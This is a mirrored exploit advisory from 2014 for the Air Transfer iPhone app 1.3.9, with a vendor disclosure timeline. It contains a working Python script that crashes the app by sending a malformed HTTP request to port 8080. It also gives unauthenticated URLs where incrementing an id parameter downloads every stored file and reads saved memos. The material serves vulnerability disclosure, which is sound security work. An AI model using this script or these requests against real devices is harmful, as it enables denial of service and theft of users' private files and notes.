首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities
来源:@samanL33T 作者:Singh 发布时间:2014-08-25  
# Exploit Title: Air Transfer Iphone v1.3.9 -Remote crash, Broken Authentication file download and Memo Access.
# Date: 08/23/2014
# Author: Samandeep Singh (SaMaN - @samanL33T )
# Vendor Homepage:http://www.darinsoft.co.kr/sub_htmls/airtransfer_guide.html
  https://itunes.apple.com/us/app/air-transfer/id521595136?mt=8
# Category: WebApp
# Version: 1.3.9
# Patch/ Fix: Not available
---------------------------------------------------

Disclosure Time line
=======================
[Aug. 19 2014]  Vendor Contacted
[Aug. 19 2014]  Vendor replied
[Aug. 19 2014]  Vendor Informed about vulnerability with POC.(No reply received)
[Aug. 21 2014]  Notified vendor about Public disclosure after 24 hours (No reply received)
[Aug. 23 2014]  Public Disclosure.

--------------------------------------------------------

Product & Service Details:
==========================
Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.

Features include:
-----------------

* The easiest way to transfer files between PC and iPhone/iPad !
* Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection !



Vulnerability details
=========================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Remote Application Crashing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/python
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host=raw_input("Enter IP : ")
port=8080
def connect():
    try:
        s.connect((str(host),port))
    except socket.error:
        print "Error: couldn't connect"
        sys.exit()
    return "connected to target"
#Crashing the App
def crashing():
    req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
    try:
        s.sendall(req)
    except:
        print "Error occured, Couldn't crash App"
        sys.exit()
    return "Application Down, Conection closed" 
print connect()
print crashing()
______________________________________________________________________________________________________________________________

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2. Broken Authentication - Memo access & File download.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To download any file simply visit:

http://<IP>:8080/?downloadSingle?id=1

Just by incrementing the value of "id" we can download all the files. 

TO view saved memos visit the below link:

http://<IP>:8080/getText?id=0


We can look for all the memos by incrementing the value of "id"



#SaMaN(@samanL33T)























 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ManageEngine Desktop Central /
·ManageEngine Password Manager
·SMF Flood Filter Issue
·Grand MA 300 Fingerprint Reade
·glibc Off-by-One NUL Byte gcon
·Firefox WebIDL Privileged Java
·HybridAuth install.php PHP Cod
·Internet Explorer MS14-029 Mem
·BlazeDVD Pro v7.0 - (.plf) Buf
·Plogger 1.0-RC1 - Authenticate
·BulletProof FTP Client 2010 -
·ActualAnalyzer Lite 2.81 - Una
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved